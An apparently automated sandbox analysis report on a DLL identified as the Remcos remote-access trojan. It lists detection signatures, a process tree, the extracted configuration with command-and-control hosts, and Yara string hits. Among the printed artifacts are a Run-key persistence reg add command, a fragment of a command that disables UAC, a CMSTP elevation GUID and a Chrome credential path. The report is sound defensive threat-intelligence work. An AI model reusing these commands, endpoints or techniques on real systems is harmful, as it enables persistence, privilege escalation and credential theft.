Windows Analysis Report
7P7cuKWTfN.dll

Overview

General Information

Sample name: 7P7cuKWTfN.dll (renamed because original name is a hash value)
Original sample name: 8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0.dll
Analysis ID: 1536945
MD5: 6d5a39ffb948ce7ff8744e302201f711
SHA1: af806feeb69690f4963eaa146c1debb67a45895d
SHA256: 8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0
Tags: dll, goatratedman-com, user-JAMESWT_MHT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into foreign processes
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7496 cmdline: loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7548 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7572 cmdline: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8008 cmdline: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8100 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • rundll32.exe (PID: 8016 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • regsvr32.exe (PID: 7556 cmdline: regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • regsvr32.exe (PID: 8092 cmdline: "C:\Windows\SysWOW64\regsvr32.exe" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • rundll32.exe (PID: 7580 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8072 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7644 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7668 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8144 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 3624 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5956 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 2588 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1136 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6104 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["goatratedman.com:4050:0", "extendedbreakfast.com:5140:0"], "Assigned name": "zuma", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "bghtyi-ILS8CA", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b05e:$a1: Remcos restarted by watchdog!
  • 0x6b5d6:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(114 entries in total)

Source | Rule | Description | Author | Strings
17.2.rundll32.exe.8f0000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
17.2.rundll32.exe.8f0000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
17.2.rundll32.exe.8f0000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
17.2.rundll32.exe.8f0000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
17.2.rundll32.exe.8f0000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(215 entries in total)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7572, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 8016, ProcessName: rundll32.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8100, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*Chrome
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8008, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , ProcessId: 8100, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, CommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7572, ParentProcessName: rundll32.exe, ProcessCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, ProcessId: 8008, ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T12:15:02.559383+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:11.097889+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:20.607977+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49774 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:29.097370+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49817 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:38.607134+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49858 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:47.106960+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49907 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:56.591358+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49960 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:05.072729+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50009 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:14.593568+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50010 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:23.135021+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:32.623415+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:41.126552+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:50.623194+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50014 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:59.110987+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50015 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:08.610567+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50016 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:17.410636+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50017 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:26.922102+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:35.424734+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:17:44.936419+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:17:53.425586+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50021 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:18:02.923601+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:18:11.425822+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50023 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:18:21.003692+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50024 | 193.233.18.18 | 4050 | TCP

AV Detection

Source: 7P7cuKWTfN.dll | Avira: detected
Source: C:\Users\user\AppData\Roaming\VIVA_01.dll | Avira: detection malicious, Label: TR/AVI.Remcos.yqazi
Source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["goatratedman.com:4050:0", "extendedbreakfast.com:5140:0"], "Assigned name": "zuma", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "bghtyi-ILS8CA", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Roaming\VIVA_01.dll | ReversingLabs: Detection: 47%
Source: 7P7cuKWTfN.dll | ReversingLabs: Detection: 47%
Source: Yara match | File source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B33837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_02B33837
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A33837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_02A33837
Source: loaddll32.exe, 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_1d70fe43-a

Exploits

Source: Yara match | File source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
